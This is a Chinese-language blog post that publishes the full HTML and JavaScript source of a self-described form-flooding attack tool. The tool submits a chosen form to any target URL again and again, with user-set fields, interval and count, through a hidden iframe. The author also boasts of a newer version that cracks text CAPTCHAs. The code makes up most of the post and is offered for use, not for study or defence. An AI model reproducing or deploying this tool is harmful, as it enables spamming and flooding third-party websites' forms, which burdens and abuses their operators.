Weil Jimmer's BlogWeil Jimmer's Blog


表單灌水機JaveScript & HTML攻擊代碼

-
更新於 2015-04-26 12:48:40

最近因為寫完了VB.NET版的超高級表單灌水機後(可以破解文字驗證碼,以及真實夾帶Cookie及Session。以及表單分析,連填寫Name都不用,給網址按分析原碼就可以了。),就不想用舊版的JS&HTML的代碼了,就順便發一發。

只支持15個欄位。

很久以前寫的舊版POST/GET JS & HTML攻擊代碼:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>表單灌水</title>
<style type="text/css">
.style1 {
	border-collapse: collapse;
	border: 1px solid #FFFF00;
	align: center;
}
</style>
<script language="JavaScript">
function set_form() {
window.document.getElementById('a1').name=window.document.getElementById('b1').value;
window.document.getElementById('a2').name=window.document.getElementById('b2').value;
window.document.getElementById('a3').name=window.document.getElementById('b3').value;
window.document.getElementById('a4').name=window.document.getElementById('b4').value;
window.document.getElementById('a5').name=window.document.getElementById('b5').value;
window.document.getElementById('a6').name=window.document.getElementById('b6').value;
window.document.getElementById('a7').name=window.document.getElementById('b7').value;
window.document.getElementById('a8').name=window.document.getElementById('b8').value;
window.document.getElementById('a9').name=window.document.getElementById('b9').value;
window.document.getElementById('a10').name=window.document.getElementById('b10').value;
window.document.getElementById('a11').name=window.document.getElementById('b11').value;
window.document.getElementById('a12').name=window.document.getElementById('b12').value;
window.document.getElementById('a13').name=window.document.getElementById('b13').value;
window.document.getElementById('a14').name=window.document.getElementById('b14').value;
window.document.getElementById('a15').name=window.document.getElementById('b15').value;
window.document.getElementById('a16').name=window.document.getElementById('b16').value;
window.document.getElementById('a17').name=window.document.getElementById('b17').value;
window.document.getElementById('form1').action=window.document.getElementById('action1').value;
window.document.getElementById('form1').method=window.document.getElementById('method1').value;
window.document.getElementById('form1').name=window.document.getElementById('namex1').value;
}
function postForm() {
window.document.getElementById('form1').submit();
a=setTimeout("postForm()",window.document.getElementById('wait_x').value);
}
function timeOut() {
b=setTimeout("alert('灌水完畢!');timeStop();",(window.document.getElementById('wait_x').value*window.document.getElementById('times_x').value-1));
}
var ftimes;
ftimes=0;
function timeCount(){
ftimes=ftimes+1;
times.innerHTML='<font color=blue>第 '+ftimes+' 次</font>';
c=setTimeout("timeCount()",window.document.getElementById('wait_x').value);
return false;
}
function timeStop(){
clearTimeout(a);
clearTimeout(b);
clearTimeout(c);
ftimes=0;
}
</script>

</head>
<body  style="color: #FF00FF; background-color: #000000">
<center>
<h3><font color='red'>表單灌水機-Weil Jimmer</font></h3>
</center>
<form id="form1" name="form1" action="" method="get" target="k">
<table style="width: 950px;" border="1" cellpadding="2" cellspacing="2" class="style1" align="center">
	<tr>
		<td>目標網站(灌水):<input type="text" id="action1" name="url" value="http://www.example.com/"><input type="hidden" name="type" value="formpost" /></td>
		<td>提交方式(表單):<input type="text" id="method1" name="way" value="post"><input type="hidden" name="mod" value="1" /></td>
		<td>Name(表單名稱):<input type="text" id="namex1" name="fname" value="form1"><input type="hidden" name="start" value="1" /></td>
	</tr>
	<tr>
		<td>間隔時間(毫秒):<input type="text" id="wait_x" value="1000"></td>
		<td>提交幾次(整數):<input type="text" id="times_x" value="10"></td>
		<td>&nbsp;</td>
	</tr>
</table>
<br><br>
<table style="width: 750px;" border="1" cellpadding="3" cellspacing="3" class="style1" align="center">
	<tr>
		<td>Name01:<input type="text" id="b1" name="name1" style="width: 250px"></td>
		<td>Value01:<input type="text" id="a1" name="var1" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name02:<input type="text" id="b2" name="name2" style="width: 250px"></td>
		<td>Value02:<input type="text" id="a2" name="var2" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name03:<input type="text" id="b3" name="name3" style="width: 250px"></td>
		<td>Value03:<input type="text" id="a3" name="var3" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name04:<input type="text" id="b4" name="name4" style="width: 250px"></td>
		<td>Value04:<input type="text" id="a4" name="var4" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name05:<input type="text" id="b5" name="name5" style="width: 250px"></td>
		<td>Value05:<input type="text" id="a5" name="var5" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name06:<input type="text" id="b6" name="name6" style="width: 250px"></td>
		<td>Value06:<input type="text" id="a6" name="var6" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name07:<input type="text" id="b7" name="name7" style="width: 250px"></td>
		<td>Value07:<input type="text" id="a7" name="var7" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name08:<input type="text" id="b8" name="name8" style="width: 250px"></td>
		<td>Value08:<input type="text" id="a8" name="var8" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name09:<input type="text" id="b9" name="name9" style="width: 250px"></td>
		<td>Value09:<input type="text" id="a9" name="var9" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name10:<input type="text" id="b10" name="name10" style="width: 250px"></td>
		<td>Value10:<input type="text" id="a10" name="var10" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name11:<input type="text" id="b11" name="name11" style="width: 250px"></td>
		<td>Value11:<input type="text" id="a11" name="var11" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name12:<input type="text" id="b12" name="name12" style="width: 250px"></td>
		<td>Value12:<input type="text" id="a12" name="var12" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name13:<input type="text" id="b13" name="name13" style="width: 250px"></td>
		<td>Value13:<input type="text" id="a13" name="var13" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name14:<input type="text" id="b14" name="name14" style="width: 250px"></td>
		<td>Value14:<input type="text" id="a14" name="var14" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name15:<input type="text" id="b15" name="name15" style="width: 250px"></td>
		<td>Value15:<input type="text" id="a15" name="var15" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name :<input readonly type="text" id="b16" name="submit0" value="Submit" style="width: 250px"></td>
		<td>Value :<input type="text" id="a16" name="submit1" style="width: 300px"></td>
	</tr>
	<tr>
		<td>Name :<input readonly type="text" id="b17" name="reset0" value="Reset" style="width: 250px"></td>
		<td>Value :<input type="text" id="a17" name="reset1" style="width: 300px"></td>
	</tr>
</table>
</form>
<br><br>
<center>
<input name="button" type="button" value="開始灌水!" onclick="set_form();postForm();timeOut();timeCount();"><input name="button2" type="button" value="停止灌水!" onclick="timeStop();"><br>
<div id="times"></div></center><br>
<br></br><br></br>
<iframe name="k" id="k"  src="" height="100%" width="100%">您的瀏覽器不支援內置框架或目前的設定為不顯示內置框架。</iframe>
</body>
</html>

This entry was posted in HTML, JS By Weil Jimmer.

About Weil Jimmer

avatar

Hi! Everyone! My name is Weil Jimmer. This is my personal blog. I'm a webmaster of this site. I hope the site will be popular. Now, Let's go! Enjoy gaining more knowledge.
More Details About Me : https://weils.net/profile.php

Leave a Reply

Name*:

Email*:

Website:

Privacy:   

Comment*:

Visitor Count

pop
nonenonenone

Note

台灣假新聞橫行,沒一家霉體能信的,網軍側翼到處洗風向,堪憂。

毋忘初心,
絕不利慾薰心。

支持網路中立性.
Support Net Neutrality.

飽暖思淫欲,
饑寒起盜心。

支持臺灣實施無條件基本收入

歡迎前來本站。

Words Quiz


Search

Music

Blogging Journey

4480days

since our first blog post.

The strong do what they can and the weak suffer what they must.

Privacy is your right and ability to be yourself and express yourself without the fear that someone is looking over your shoulder and that you might be punished for being yourself, whatever that may be.

It is quality rather than quantity that matters.

I WANT Internet Freedom.

Reality made most of people lost their childishness.

Justice,Freedom,Knowledge.

Without music life would be a mistake.

Support/Donate

This site also need a little money to maintain operations, not entirely without any cost in the Internet. Your donations will be the best support and power of the site.
MethodBitcoin Address
bitcoin1gtuwCjjVVrNUHPGvW6nsuWGxSwygUv4x
buymeacoffee
Register in linode via invitation link and stay active for three months.Linode

Support The Zeitgeist Movement

The Zeitgeist Movement

The Lie We Live

The Lie We Live

The Questions We Never Ask

The Questions We Never Ask

Man

Man

THE EMPLOYMENT

Man

In The Fall

In The Fall

Facebook is EATING the Internet

Facebook

Categories

Android (7)

Announcement (4)

Arduino (2)

Bash (2)

C (3)

C# (5)

C++ (1)

Experience (52)

Flash (2)

Free (13)

Functions (36)

Games (13)

General (60)

Git (2)

HTML (7)

Java (13)

JS (7)

Mood (24)

NAS (2)

Note (32)

Office (1)

OpenWrt (6)

PHP (9)

Privacy (4)

Product (12)

Python (4)

Software (11)

The Internet (25)

Tools (16)

VB.NET (8)

WebHosting (7)

Wi-Fi (5)

XML (4)